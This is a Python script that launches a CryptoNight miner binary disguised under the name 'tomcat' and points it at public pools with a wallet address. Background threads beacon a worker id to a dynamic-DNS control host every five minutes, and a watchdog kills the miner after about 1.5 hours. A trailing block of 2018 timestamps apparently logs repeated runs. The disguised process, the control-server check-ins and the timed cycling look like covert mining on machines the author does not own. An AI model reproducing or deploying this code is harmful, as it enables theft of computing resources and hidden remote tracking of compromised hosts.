import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:01.457826
#2018-02-17 17:28:05.437017
#2018-02-17 19:17:01.311051
#2018-02-17 21:07:05.492928
#2018-02-17 22:51:06.733973
#2018-02-18 00:35:08.594292
#2018-02-18 02:25:05.974926
#2018-02-18 04:12:04.932220
#2018-02-18 06:02:05.363165
#2018-02-18 07:52:04.887904
#2018-02-18 09:41:04.293767
#2018-02-18 11:26:03.667122
#2018-02-18 13:12:06.479905
#2018-02-18 15:01:01.954760
#2018-02-18 16:49:05.127265
#2018-02-18 18:37:01.773212
#2018-02-18 20:24:08.117103
#2018-02-18 22:10:06.062666
#2018-02-18 23:58:05.389546
#2018-02-19 01:44:06.011800
#2018-02-19 03:33:07.627956
#2018-02-19 05:18:02.068185
#2018-02-19 07:04:05.969578
#2018-02-19 08:52:05.543063
#2018-02-19 10:41:05.518504
#2018-02-19 12:28:01.420829
#2018-02-19 14:17:01.373843
#2018-02-19 16:05:11.286515
#2018-02-19 17:54:06.164390
#2018-02-19 19:41:07.420254
#2018-02-19 21:30:11.413575
#2018-02-19 23:17:02.061098
#2018-02-20 01:03:07.133002
#2018-02-20 02:51:07.564510
#2018-02-20 04:38:06.649031
#2018-02-20 06:21:07.416163
#2018-02-20 08:06:07.056775
#2018-02-20 09:52:06.663489
#2018-02-20 11:35:08.812890
#2018-02-20 13:21:08.232118
#2018-02-20 15:06:07.613471
#2018-02-20 16:50:03.179960
#2018-02-20 18:38:04.672841
#2018-02-20 20:28:04.035438
#2018-02-20 22:13:03.944697
#2018-02-20 23:54:01.514232
#2018-02-21 01:41:03.571952
#2018-02-21 03:28:06.189104
#2018-02-21 05:16:05.085596
#2018-02-21 07:04:02.061657
#2018-02-21 08:50:05.205171
#2018-02-21 10:37:08.278112
#2018-02-21 12:25:01.685330
#2018-02-21 14:11:08.421558
#2018-02-21 15:57:08.940603
#2018-02-21 17:50:06.666618
#2018-02-21 19:37:01.662596
#2018-02-21 21:24:01.677419
#2018-02-21 23:10:05.965717
#2018-02-22 00:58:04.343749
#2018-02-22 02:46:07.213397
#2018-02-22 04:32:06.926449
#2018-02-22 06:17:05.587430
#2018-02-22 08:04:01.538457
#2018-02-22 09:52:07.275274
#2018-02-22 11:38:09.649999
#2018-02-22 13:25:02.008057
#2018-02-22 15:15:12.676887
#2018-02-22 17:02:06.976882
#2018-02-22 18:48:07.767153
#2018-02-22 20:39:04.217471
#2018-02-22 22:24:06.093280
#2018-02-23 00:11:01.651998
#2018-02-23 02:00:09.654439
#2018-02-23 03:47:06.304754
#2018-02-23 05:31:06.150768
#2018-02-23 07:16:02.046831
#2018-02-23 09:21:04.820806
#2018-02-23 11:27:01.960822
#2018-02-23 13:18:04.493723
#2018-02-23 15:03:02.147637
#2018-02-23 16:51:07.233939
#2018-02-23 18:41:07.214062
#2018-02-23 20:27:04.021932
#2018-02-23 22:15:03.737944
#2018-02-24 00:03:01.784143
#2018-02-24 01:52:04.736452
#2018-02-24 03:44:06.823929
#2018-02-24 05:37:01.951493
#2018-02-24 07:23:05.447276
#2018-02-24 09:12:03.861853
#2018-02-24 11:07:05.370120
#2018-02-24 12:55:03.012713
#2018-02-24 14:43:05.439926
#2018-02-24 16:34:01.567965
#2018-02-24 18:23:06.596063
#2018-02-24 20:09:03.769399
#2018-02-24 21:53:05.050864
#2018-02-25 01:59:06.621112
#2018-02-25 05:54:06.230223
#2018-02-25 11:38:01.709268